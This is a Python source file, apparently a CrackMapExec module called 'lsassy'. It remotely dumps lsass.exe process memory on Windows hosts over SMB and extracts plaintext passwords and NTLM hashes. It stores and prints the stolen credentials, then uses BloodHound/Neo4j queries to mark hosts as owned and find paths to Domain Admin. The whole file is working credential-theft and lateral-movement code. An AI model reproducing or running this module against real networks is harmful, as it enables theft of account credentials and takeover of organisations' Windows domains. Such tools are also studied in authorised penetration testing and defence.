# Author: # Romain Bentz (pixis - @hackanddo) # Website: # https://beta.hackndo.com [FR] # https://en.hackndo.com [EN] import json import sys from lsassy import Lsassy, Logger, Dumper, Parser, Writer class CMEModule: name = 'lsassy' description = "Dump lsass and parse the result remotely with lsassy" supported_protocols = ['smb'] opsec_safe = True multiple_hosts = True def options(self, context, module_options): """ METHOD Method to use to dump lsass.exe with lsassy. See lsassy -h for more details REMOTE_LSASS_DUMP Name of the remote lsass dump (default: Random) PROCDUMP_PATH Path to procdump on attacker host (Required for method 2) DUMPERT_PATH Path to procdump on attacker host (Required for method 5) BLOODHOUND Enable Bloodhound integration (default: false) NEO4JURI URI for Neo4j database (default: NEO4JPORT Listeninfg port for Neo4j database (default: 7687) NEO4JUSER Username for Neo4j database (default: 'neo4j') NEO4JPASS Password for Neo4j database (default: 'neo4j') WITHOUT_EDGES List of black listed edges (example: 'SQLAdmin,CanRDP', default: '') """ self.method = False self.remote_lsass_dump = False self.procdump_path = False self.dumpert_path = False if 'METHOD' in module_options: self.method = module_options['METHOD'] if 'REMOTE_LSASS_DUMP' in module_options: self.remote_lsass_dump = module_options['REMOTE_LSASS_DUMP'] if 'PROCDUMP_PATH' in module_options: self.procdump_path = module_options['PROCDUMP_PATH'] if 'DUMPERT_PATH' in module_options: self.dumpert_path = module_options['DUMPERT_PATH'] self.bloodhound = False self.neo4j_URI = "" self.neo4j_Port = "7687" self.neo4j_user = "neo4j" self.neo4j_pass = "neo4j" self.without_edges = "" if module_options and 'BLOODHOUND' in module_options: self.bloodhound = module_options['BLOODHOUND'] if module_options and 'NEO4JURI' in module_options: self.neo4j_URI = module_options['NEO4JURI'] if module_options and 'NEO4JPORT' in module_options: self.neo4j_Port = module_options['NEO4JPORT'] if module_options and 'NEO4JUSER' in module_options: self.neo4j_user = module_options['NEO4JUSER'] if module_options and 'NEO4JPASS' in module_options: self.neo4j_pass = module_options['NEO4JPASS'] if module_options and 'WITHOUT_EDGES' in module_options: self.without_edges = module_options['WITHOUT_EDGES'] def on_admin_login(self, context, connection): if self.bloodhound: self.set_as_owned(context, connection) domain_name = connection.domain username = connection.username password = getattr(connection, "password", "") lmhash = getattr(connection, "lmhash", "") nthash = getattr(connection, "nthash", "") kerberos = getattr(connection, "kerberos", "") password = "" if password is None else password lmhash = "" if lmhash is None else lmhash nthash = "" if nthash is None else nthash host = connection.host log_options = Logger.Options() dump_options = Dumper.Options() parse_options = Parser.Options() write_option = Writer.Options(format="json", quiet=True) if self.method: dump_options.method = int(self.method) if self.remote_lsass_dump: dump_options.dumpname = self.remote_lsass_dump if self.procdump_path: dump_options.procdump_path = self.procdump_path if self.dumpert_path: dump_options.dumpert_path = self.dumpert_path lsassy = Lsassy( kerberos=kerberos, hostname=host, username=username, domain=domain_name, password=password, lmhash=lmhash, nthash=nthash, log_options=log_options, dump_options=dump_options, parse_options=parse_options, write_options=write_option ) credentials = lsassy.get_credentials() if not credentials['success']: context.log.error(credentials['error_msg']) if context.verbose and credentials['error_exception']: context.log.error(credentials['error_exception']) else: self.process_credentials(context, connection, credentials["credentials"]) def process_credentials(self, context, connection, credentials): credentials = json.loads(credentials) if len(credentials) == 0: context.log.info("No credentials found") for domain, creds in credentials.items(): for username, passwords in creds.items(): for password in passwords: plain = password["password"] lmhash = password["lmhash"] nthash = password["nthash"] self.save_credentials(context, connection, domain, username, plain, lmhash, nthash) self.print_credentials(context, connection, domain, username, plain, lmhash, nthash) @staticmethod def save_credentials(context, connection, domain, username, password, lmhash, nthash): host_id = context.db.get_computers(connection.host)[0][0] if password is not None: credential_type = 'plaintext' else: credential_type = 'hash' password = ':'.join(h for h in [lmhash, nthash] if h is not None) context.db.add_credential(credential_type, domain, username, password, pillaged_from=host_id) def print_credentials(self, context, connection, domain, username, password, lmhash, nthash): if password is None: password = ':'.join(h for h in [lmhash, nthash] if h is not None) output = "%s\\%s %s" % (domain, username, password) if self.bloodhound and self.bloodhound_analysis(context, connection, username): output += " [{}PATH TO DA{}]".format('\033[91m', '\033[93m') # Red and back to yellow context.log.highlight(output) def set_as_owned(self, context, connection): try: from neo4j.v1 import GraphDatabase except: from neo4j import GraphDatabase from neo4j.exceptions import AuthError, ServiceUnavailable host_fqdn = (connection.hostname + "." + connection.domain).upper() uri = "bolt://{}:{}".format(self.neo4j_URI, self.neo4j_Port) try: driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass)) except AuthError as e: context.log.error( "Provided credentials ({}:{}) are not valid. See --options".format(self.neo4j_user, self.neo4j_pass)) sys.exit() except ServiceUnavailable as e: context.log.error("Neo4J does not seem to be available on {}. See --options".format(uri)) sys.exit() except Exception as e: context.log.error("Unexpected error with Neo4J") context.log.debug("Error : ".format(str(e))) sys.exit() with driver.session() as session: with session.begin_transaction() as tx: result = tx.run( "MATCH (c:Computer {{name:\"{}\"}}) SET c.owned=True RETURN c.name AS name".format(host_fqdn)) if len(result.value()) > 0: context.log.success("Node {} successfully set as owned in BloodHound".format(host_fqdn)) else: context.log.error( "Node {} does not appear to be in Neo4J database. Have you imported correct data ?".format(host_fqdn)) driver.close() def bloodhound_analysis(self, context, connection, username): try: from neo4j.v1 import GraphDatabase except: from neo4j import GraphDatabase from neo4j.exceptions import AuthError, ServiceUnavailable username = (username + "@" + connection.domain).upper().replace("\\", "\\\\") uri = "bolt://{}:{}".format(self.neo4j_URI, self.neo4j_Port) try: driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass)) except AuthError as e: context.log.error( "Provided credentials ({}:{}) are not valid. See --options".format(self.neo4j_user, self.neo4j_pass)) return False except ServiceUnavailable as e: context.log.error("Neo4J does not seem to be available on {}. See --options".format(uri)) return False except Exception as e: context.log.error("Unexpected error with Neo4J") context.log.debug("Error : ".format(str(e))) return False edges = [ "MemberOf", "HasSession", "AdminTo", "AllExtendedRights", "AddMember", "ForceChangePassword", "GenericAll", "GenericWrite", "Owns", "WriteDacl", "WriteOwner", "CanRDP", "ExecuteDCOM", "AllowedToDelegate", "ReadLAPSPassword", "Contains", "GpLink", "AddAllowedToAct", "AllowedToAct", "SQLAdmin" ] # Remove blacklisted edges without_edges = [e.lower() for e in self.without_edges.split(",")] effective_edges = [edge for edge in edges if edge.lower() not in without_edges] with driver.session() as session: with session.begin_transaction() as tx: query = """ MATCH (n:User {{name:\"{}\"}}),(m:Group),p=shortestPath((n)-[r:{}*1..]->(m)) WHERE m.objectsid ENDS WITH "-512" OR m.objectid ENDS WITH "-512" RETURN COUNT(p) AS pathNb """.format(username, '|'.join(effective_edges)) context.log.debug("Query : {}".format(query)) result = tx.run(query) driver.close() return result.value()[0] > 0